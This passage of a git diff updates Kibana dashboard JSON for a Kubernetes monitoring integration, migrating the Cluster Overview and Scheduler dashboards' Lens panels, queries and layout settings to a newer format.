{ + "exists": { + "field": "kubernetes.pod.memory.usage.limit.pct" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + 
"gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "yConfig": [ + { + "color": "#00bfb3", + "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "type": "index-pattern" + "title": "Cpu Usage per Namespace [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Top memory intensive pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "2525515f-80e7-455f-b88b-53e4abf31cd2", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "2525515f-80e7-455f-b88b-53e4abf31cd2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a69d8e15-2ebf-401c-af12-4b6762f230db": { + 
"columnOrder": [ + "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", + "b0cd680f-edeb-4934-aceb-6820ad9f01ec", + "b7df21c2-ee65-47cb-9370-294846cfbb65" + ], + "columns": { + "b0cd680f-edeb-4934-aceb-6820ad9f01ec": { + "customLabel": false, + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "b7df21c2-ee65-47cb-9370-294846cfbb65": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.event.metadata.uid: * and kubernetes.event.type : \"Warning\" " + }, + "isBucketed": false, + "label": "New Warnings", + "operationType": "count", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a69d8e15-2ebf-401c-af12-4b6762f230db": { - "columnOrder": [ - "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", - "b0cd680f-edeb-4934-aceb-6820ad9f01ec", - "b7df21c2-ee65-47cb-9370-294846cfbb65" - ], - "columns": { - "b0cd680f-edeb-4934-aceb-6820ad9f01ec": { - "customLabel": false, - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "b7df21c2-ee65-47cb-9370-294846cfbb65": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.event.metadata.uid: * and kubernetes.event.type : \"Warning\" " - }, - "isBucketed": false, - "label": "New Warnings", - "operationType": "count", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": 
"kubernetes.event.metadata.uid" - }, - "be5ed114-ba6d-42c6-b8ff-da6142c14a1b": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.event.involved_object.uid + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "b7df21c2-ee65-47cb-9370-294846cfbb65", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.event.type" - ], - "size": 1000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.event.involved_object.uid" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.event.metadata.uid" + }, + "be5ed114-ba6d-42c6-b8ff-da6142c14a1b": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.event.involved_object.uid + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b7df21c2-ee65-47cb-9370-294846cfbb65", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.event" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.event" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b7df21c2-ee65-47cb-9370-294846cfbb65" - ], - 
"collapseFn": "sum", - "layerId": "a69d8e15-2ebf-401c-af12-4b6762f230db", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", - "xAccessor": "b0cd680f-edeb-4934-aceb-6820ad9f01ec", - "yConfig": [ - { - "color": "#fec514", - "forAccessor": "b7df21c2-ee65-47cb-9370-294846cfbb65" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + "kubernetes.event.type" + ], + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.event.involved_object.uid" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.event" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "2525515f-80e7-455f-b88b-53e4abf31cd2", - "w": 24, - "x": 0, - "y": 30 - }, - "panelIndex": "2525515f-80e7-455f-b88b-53e4abf31cd2", - "title": "Kubernetes warning events", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + 
"labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b7df21c2-ee65-47cb-9370-294846cfbb65" + ], + "collapseFn": "sum", + "layerId": "a69d8e15-2ebf-401c-af12-4b6762f230db", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "be5ed114-ba6d-42c6-b8ff-da6142c14a1b", + "xAccessor": "b0cd680f-edeb-4934-aceb-6820ad9f01ec", + "yConfig": [ + { + "color": "#fec514", + "forAccessor": "b7df21c2-ee65-47cb-9370-294846cfbb65" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "a59fd3c5-5f33-425d-b14e-4713222cc729", - "w": 24, - "x": 24, - "y": 30 - }, - "panelIndex": "a59fd3c5-5f33-425d-b14e-4713222cc729", - "panelRefName": "panel_a59fd3c5-5f33-425d-b14e-4713222cc729", - "title": "Latest Kubernetes warnings", - "type": "search", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Cluster Overview", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-12T14:44:58.161Z", - "id": "kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"d0fadeee-3c79-443b-bfcb-b70e78d168e9:fbaf3405-fab6-4f09-883d-45368cf97670", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a91d36c0-f405-4c04-8510-11134bd259f0:21cde57c-0e69-4e4c-b3e9-659de2778d06", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:5c81359c-376d-41bd-984d-60fb106f2e33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:a06a30d5-05f1-46ea-9075-3e6051f5781a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:d79e5279-bd92-48b0-bd92-767cf6b8892d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", - "type": "index-pattern" 
- }, - { - "id": "metrics-*", - "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:086a73a8-ac9d-48eb-b5b7-3c697278cc9e", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8", - "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:panel_a59fd3c5-5f33-425d-b14e-4713222cc729", - "type": "search" + "title": "Kubernetes warning events" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "columns": [ + "kubernetes.event.type", + "kubernetes.event.reason", + "kubernetes.event.involved_object.name" + ], + "description": "Kubernetes Warnings", + "grid": { + "columns": { + "kubernetes.event.involved_object.kind": { + "width": 198.30555555555554 + }, + "kubernetes.event.metadata.namespace": { + "width": 249.83333333333337 + }, + "kubernetes.event.reason": { + "width": 176.33333333333331 + }, + "kubernetes.event.type": { + "width": 156.91666666666663 + } + } + }, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"kubernetes.event.type\",\"negate\":false,\"params\":{\"query\":\"Warning\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"kubernetes.event.type\":\"Warning\"}}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset :\\\"kubernetes.event\\\" \"}}" + }, + "rowHeight": -1, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false, + "title": "Kubernetes Warnings", + "usesAdHocDataView": false, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + 
"id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "controlGroup_748291db-2826-4242-9107-9a5226733a06:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 11, + "i": "a59fd3c5-5f33-425d-b14e-4713222cc729", + "w": 24, + "x": 24, + "y": 30 }, - { - "id": "metrics-*", - "name": "controlGroup_2da8af79-7928-4741-8d03-866642f3c2a0:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "a59fd3c5-5f33-425d-b14e-4713222cc729", + "title": "Latest Kubernetes warnings", + "type": "search", + "version": "8.0.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Cluster Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d0fadeee-3c79-443b-bfcb-b70e78d168e9:fbaf3405-fab6-4f09-883d-45368cf97670", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a91d36c0-f405-4c04-8510-11134bd259f0:21cde57c-0e69-4e4c-b3e9-659de2778d06", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64dd7c4e-b503-4cc4-8c61-e17c52204b54:indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"64dd7c4e-b503-4cc4-8c61-e17c52204b54:5c81359c-376d-41bd-984d-60fb106f2e33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:a06a30d5-05f1-46ea-9075-3e6051f5781a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "14ceb02d-63b6-448a-85fe-28a9e974e80c:9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "783789d4-8473-40f5-acf0-7ae5c850cd3e:d79e5279-bd92-48b0-bd92-767cf6b8892d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:indexpattern-datasource-layer-a69d8e15-2ebf-401c-af12-4b6762f230db", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2525515f-80e7-455f-b88b-53e4abf31cd2:086a73a8-ac9d-48eb-b5b7-3c697278cc9e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_748291db-2826-4242-9107-9a5226733a06:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_2da8af79-7928-4741-8d03-866642f3c2a0:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "a59fd3c5-5f33-425d-b14e-4713222cc729:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "metrics-*" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + 
"typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json b/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json index 8c92202ee74..35a1626c9fa 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249.json 
@@ -1,3666 +1,3693 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 
"{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Scheduler metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.scheduler" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.scheduler" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 12, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 13, + "x": 0, + "y": 0 }, - "description": "Kubernetes Scheduler metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": 
"### Scheduler\n\nThis dashboard collects metrics from [kube scheduler](https://kubernetes.io/docs/concepts/overview/components/#kube-scheduler) endpoint. Its purpose is to give an overview of what is happening inside it through this component metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the Kubernetes scheduler endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 35, + "x": 13, + "y": 0 + }, + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Scheduling", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + 
"markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "a47d16df-1a5a-49e1-9a33-dba87c371904", + "w": 16, + "x": 13, + "y": 3 + }, + "panelIndex": "a47d16df-1a5a-49e1-9a33-dba87c371904", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: This section is meant for **one** cluster. Please, filter above. 
Otherwise, results might be inaccurate.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a2b844d8-11e3-4469-af4b-744d33b603ad", + "w": 19, + "x": 29, + "y": 3 + }, + "panelIndex": "a2b844d8-11e3-4469-af4b-744d33b603ad", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0c578d26-c937-4b73-a3a6-e15ebd5854e6": { + "columnOrder": [ + "51d8044e-b2ce-4afa-bca8-4898ee203019", + "680c2d97-35c9-4804-9c57-06645378bef4", + "3309a725-61ed-41e9-99cf-c37888da689b" + ], + "columns": { + "3309a725-61ed-41e9-99cf-c37888da689b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.pending.pods.count: *" + }, + "isBucketed": false, + "label": "Total", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.pending.pods.count" }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.scheduler" + "51d8044e-b2ce-4afa-bca8-4898ee203019": { + "customLabel": false, + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of kubernetes.scheduler.queue", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", + "type": "column" }, - "type": "phrase" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": 
"ordinal", + "sourceField": "kubernetes.scheduler.queue" }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.scheduler" - } + "680c2d97-35c9-4804-9c57-06645378bef4": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Scheduler node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" } + }, + "incompleteColumns": {} } - ], - "query": { - "language": "kuery", - "query": "" + } } - } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "3309a725-61ed-41e9-99cf-c37888da689b" + }, + { + "alignment": "center", + "columnId": "680c2d97-35c9-4804-9c57-06645378bef4", + "isTransposed": false + }, + { + "columnId": "51d8044e-b2ce-4afa-bca8-4898ee203019", + "isTransposed": true + } + ], + "headerRowHeight": "auto", + "layerId": "0c578d26-c937-4b73-a3a6-e15ebd5854e6", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", 